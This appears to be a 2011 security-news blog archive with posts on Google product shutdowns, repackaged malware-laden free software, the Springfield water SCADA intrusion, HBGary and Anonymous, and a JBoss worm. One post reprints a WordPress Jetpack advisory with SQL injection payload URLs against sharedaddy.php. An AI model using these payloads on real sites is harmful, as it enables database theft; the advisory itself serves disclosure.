Wednesday 23 November 2011

Google To Shut Down More Seven Products


Google To Shut Down More Seven Products
The out-of-season "spring clean" brings an end to services including Google Wave, Knol and Google Gears.It is the third time Google has announced a cull of several of its products at the same time after they had failed to take off.Experts said the strategy might put off users from signing up to new services.
"We're in the process of shutting a number of products which haven't had the impact we'd hoped for, integrating others as features into our broader product efforts, and ending several which have shown us a different path forward," said Urs Holzle, Google's vice president of operations at the official google blog.

The list includes - 
  • Google Wave - An attempt to combine email and instant messaging for real-time collaboration.
  • Google Bookmarks Lists - A service which allowed users to share bookmarks with friends.
  • Google Friend Connect - A service that allowed webmasters to add social features to their sites by embedding a snippet of code.
  • Google Gears -  much-hyped effort to maintain web browser functionality when working offline.
  • Knol - A Wikipedia-style project, which aimed to improve web content.
  • Renewable Energy Cheaper than Coal - A project which aimed to find ways to improve solar power.
  • Google Search Timeline - A graph of historical query results.
To know more details like when the switch-off will take place visit the GOOGLEBLOG

Tuesday 22 November 2011

Do you download Free Softwares from UN-OFFICIAL websites


Do you download Free Softwares from UN-OFFICIAL websites?


know you are pro in searching and downloading pirated software’s and am sure you are aware of the risk behind it. But what about Open source and Free software’s? Do you download them from any 3rd party websites or file sharing networks? ..well its time to be aware of the Risk.

Popular open-source software’s that are being downloaded by thousands of internet users everyday includes VLC media player, Google Chrome browser and others. Most people prefer downloading these from unofficial websites, because they feel its more complicated when downloading from Official Websites, Like in the case of downloading ‘Google chrome browser’ from official webpage, you are first required to download small downloader which will then download and install the chrome browser on your PC. But many other websites provide download link for the full “Google chrome” exe file and people prefer this way.


Do you download Free Softwares from UN-OFFICIAL websites


We all know that the main objective of open-source software developers, is to share the source code with everyone. Because they expect other developers to fix any bugs or add new features to it and make it more beautiful. But some time it gets abused.

Scammers are taking advantage of the availability of the source code to trick users and make money. The Scammers are adding malware and adware to these software’s and releasing them as the original product. Some deceptive sites are even re-branding the original open-source project and selling them as a new product.
Trusted Websites: brother-soft | cnet | sourceforge | filehippo

The Scammers are Binding “open-source sofwares” with various crapware to monetize the software with loads of advertisements and earn money. The result of this is a poor product that doesn’t work as intended, that can’t be uninstalled and that clearly abuses its users and their privacy. Recently there were reports that some websites are selling “Mozilla Firefox browser”, using the Mozilla trademarks to promote other products and services, or using modified versions of the Mozilla trademarks.
How these Scammers work?

#1 They Download the source code from open source projects and add adware or malware to it.
#2 They release their version of product and disguise as the original.
#3 They advertise their product on adverting networks like Google AdWords.
#4 They earn more money through the malware and adware bundled with their version of Free Software.
#5 They buy more advertisements to spread their copy of free software and earn even more.

These activities are indeed deceptive, harm users and cause consumer confusion. Open source Softwares are affected and will keep on affected by this scourge and there’s not much we can do about it. So the next time you download any free open-source software, make sure you are on the right place


source

Sunday 20 November 2011

OS.js - The JavaScript Operating System

OS.js (JavaScript Operating System)  
OS.js
OS.js started out as a tool to use that can be used to  run GUI applications to configure services without installing X and a window manager (including VNC or similar remote management) and connect from anywhere in the world just using a web-browser. This one Includes a window manager and a simple desktop environment (similar to most Linux environments out there). Standards are inspired by GTK and freedesktopApplications are developed using Glade Interface Designer (GTK+3 XML) and (optionally) an SQL database XML-scheme,A built-in compiler creates JavaScript, CSS, SQL and PHP templates from the projects including support for events (signals). One can also create static applications from raw HTML, JS and CSS.A Virtual Filesystem(VFS) is included. It works with local files, block devices, network connections, compressed files etc.Applications uses a public API that consists of simple OS operations and calls to the application server-side script and the core libraries (File-system with restrictions), Networking, Services, Configuration files etc.).

OS.js’ code-base is light-weight and small in size.
  • JavaScript < 300kb (minimized, including applications etc.)
  • CSS < 200 kb (minimized, including applications etc.)
  • XML: < 300 kb (including applications etc.)
  • PHP < 200 kb

Features:
  • Follows strict coding standards, fully documented
  • Uses HTML5 and CSS2+ features (Supported features are detected on first run.)
  • Uses a light-weight PHP backend
  • Simple process managment (process stack, kill processes etc)
  • Desktop environment (Customizable settings, themes, fonts, cursors etc)
  • Window Managment (With standard window actions like maximize, minimize, restore, on-top and so on)
  • Session Managment (Save and restore sessions for later use)
  • Desktop Panels (movable)
  • Desktop Panel items (See list below)
  • Sandboxed Applications with API access and crash-handling
  • Uses WebStorage to store system/user/application settings and sessions (SQL as backup in case of deletion of browser cache)
  • TCP/IP Socket connections via WebSocket wrapper (hybi-00 and hybi-10)
  • Application Compiler (Compiles Application+Glade-XML into JavaScript, CSS and PHP code, also minifies the code)
  • VFS – Virtual Filesystem support (Block devices, Network connections, Compressed files etc.)
  • Application WebWorkers for faster processing of complex data

Compability:
  • WorkingLinux with WebKit/Safari/ChromeGecko/Mozilla/Firefox (Safari has some minor CSS issues)
  • WokringGoogle Android 2.2 (Samsung Galaxy S tested 2.2/2.3)
  • WokringApple iOS 4 (iPad iOS4 tested)
  • Probably workingWindows with WebKit/Safari/ChromeGecko/Mozilla/Firefox (Safari has some minor CSS issues)
  • Partially workingOpera 10+ – Problem with Glade/GTK CSS
  • Partially working: Internet Explorer 8  Problem with Glade/GTK CSS, Missing WebSocket and Canvas
  • Not tested: Internet Explorer 9



For More Information Visit The PROJECT PAGE

Saturday 19 November 2011

Hackers Attack City Water Station and Destroys a Pump


Hackers Attack City Water Station and Destroys a Pump
Hackers gained remote access into the control system of the city water utility in Springfield, Illinois, and destroyed a pump last week, according to a report released by a state fusion center and obtained by a security expert.The hackers were discovered on Nov. 8 when a water district employee noticed problems in the city’s Supervisory Control and Data Acquisition System (SCADA). The system kept turning on and off, resulting in the burnout of a water pump.
The intruders launched their attack from IP addresses based in Russia and gained access by first hacking into the network of a software vendor that makes the SCADA system used by the utility. The hackers stole usernames and passwords that the vendor maintained for its customers, and then used those credentials to gain remote access to the utility’s network.
“It is unknown, at this time, the number of SCADA usernames and passwords acquired from the software company’s database and if any additional SCADA systems have been attacked as a result of this theft,” the report states, according to Joe Weiss.

Wordpress Jetpack Plugin Vulnerable to SQL Injection

Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability
# Date: 2011-19-11
# Author: longrifle0x
# software: Wordpress
# Download:http://wordpress.org/extend/plugins/jetpack/
# Tools: SQLMAP
















Jetpack is a WordPress plugin that supercharges your self-hosted WordPress site with the awesome cloud power of WordPress.com.A SQL vulnerability have been found by longrifle0x in this plugin.



File: wp-content/plugins/jetpack/modules/sharedaddy.php

Exploit: id=-1; or 1=if

Exploitation:
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php[GET][id=-1][CURRENT_USER()
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None'LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php[GET][id=-1][MID((VERSION()),1,6)
Via - 1337day

Thursday 17 November 2011

After dealing with Anonymous HBGary Federals CEO resigns

After dealing with Anonymous HBGary Federals CEO resigns 


The game is over for Aaron Barr. HBGary Federal’s CEO, who was targeted by Anonymous, announced his resignation on Monday during an interview with Kaspersky's news portal, Threatpost. Barr said he would step down to focus on his family and rebuild his reputation.
Aaron Barr has rarely given interviews to the media since the events that led to Anonymous using him, his company HBGary Federal, and its parent firm HBGary, as an object lesson over a story he gave to the Financial Times. So his interview with Threatpost was both expected, given his announcement, and random, considering his silence.
“I need to focus on taking care of my family and rebuilding my reputation," Barr said during his conversation with Threatpost.
"It’s been a challenge to do that and run a company. And, given that I’ve been the focus of much of bad press, I hope that, by leaving, HBGary and HBGary Federal can get away from some of that. I’m confident they’ll be able to weather this storm.”
The storm started when Barr told the Financial Times on February 5, that he had used clues found online to discover the identities of key Anonymous associates.
He said was able to make these connections by using services such as LinkedIn, Classmates.com, and Facebook, as well as IRC itself. The data he collected was to be used for a presentation during B-Sides San Francisco.
The reaction from Anonymous to the story Barr told was swift and brutal. They compromised HBGary and HBGary Federal, leveraging Web vulnerabilities, as well as privilege elevation exploits, to hijack everything from Twitter and LinkedIn accounts to the company email. The hijacked email is what caused Barr the majority of his problems.
While reading the company communications, Anonymous discovered that Barr was shopping his research to various federal agencies, as well as bragging to co-workers that he had infiltrated the loosely associative group.
Given Barr’s claims, Anonymous released the hijacked emails, holding only Greg Hoglund’s emails in reserve. Some time later, Anonymous released those emails as well. To coincide with the final HBGary leak, they developed a website that contains more than 70,000 HBGary emails in a searchable listing, dubbed AnonLeaks.
The leaked communications provided an interesting look into a security company that deals with both the private and the government sectors at the same time. It was from these emails, as well as a tip from Crowdleaks.org, that The Tech Herald was able to break the story of Barr’s role in a plot with two other data intelligence firms to target WikiLeaks and journalist Glenn Greenwald.
Days after that story broke, ThinkProgress reported on another discovery from the leaked HBGary and HBGary Federal email cache.
According to them, Barr and the same data intelligence firms also developed plans for the U.S. Chamber of Commerce, which would allow them to “undermine their political opponents, including ThinkProgress, with a surreptitious sabotage campaign.” To make matters worse, the plans included families and children.

JBoss attack proves Microsofts Zero-Day findings

JBoss attack proves Microsoft’s Zero-Day findings. Credit: Red Hat.

JBoss attack proves Microsoft’s Zero-Day findings

A Worm targeting unpatched or improperly configured JBoss installations adds some proof to Microsoft’s research findings released earlier this month, which point to the fact that unknown vulnerabilities aren’t as big of a threat as they are made out to be.

According to Red Hat, a Worm targeting problems addressed over a year ago is spreading online, which allows an attacker to run arbitrary code on compromised systems. The Worm was broken down by a freelance security researcher, who happened to come across it when his Honeypot server was attacked.

“I explored the contents of the malicious payload left, and it contained Perl Scripts to automatically connect the compromised host to an IRC Server and be part of a BOTNET,” wrote the researcher, who uses the name @guerilla7 on Twitter.

"[The Perl Scripts] install and run a remote access tool using DynDNS (Flu.pl), and two Windows batch scripts, one is for exploring JBOSS Services (wstools.bat) and a script to discover all UDP-based members running on a certain mcast addressJGroups called "JGroups Cluster Discovery Script for Win32" (probe.bat)."

The authentication bypass vulnerabilities in JBoss were patched in April 2010, and they were covered along with other issues by Christian Papathanasiou, during Trustwave’s BlackHat EU talk the same year. It’s worth reading up on the security concerns, if your organization is one of the tens of thousands of enterprises using it in JSP deployments. [BlackHat EU 2010 Slides]

Likewise, guidance on dealing with password configuration protection related issues can be seen here.

“This problem is exacerbated by many organizations deploying systems that they don’t keep up to date. Many businesses outsource Web application development and once the application is deployed, service contracts may lapse or IT staff may not be paying much attention to them. Many organizations treat these deployments as black boxes, and don’t touch them out of fear that they'll break something,” commented Marcus Carey, security researcher at Rapid7.


“There are three exploit modules in Metasploit, an open source security tool, that exploit this vulnerability. There is also a scanner available in Metasploit to allow organizations to scan for it...yet many organizations are not doing so and are seriously dropping the ball. The use of this new malware associated with JBoss is something we have not seen before; however, the actual vulnerability it is exploiting should have been snuffed out years ago. This is far more a business failure than a software security failure at this point.”

As mentioned, the JBoss attack is a textbook example of what Microsoft reported earlier this month. In their annual Security Intelligence Report, Microsoft said that security flaws where patches are available greatly outnumber zero-day attacks.

According to the research, exploits with a patch available for over a year accounted for 3.2% of compromises, compared to 2.4% for patches available for less than a year. Much-talked-about zero-day attacks were responsible for just 0.12% activity.

“The numbers don't lie; organizations are much more likely to be hit with something they didn't patch instead of a zero-day. This latest news story, as well as the Microsoft report both scream the need to get back to the basics in security. This means better training users and system administrators to prioritize known threats,” added Carey.
Additional Red Hat information on JBoss is can be viewed here and here.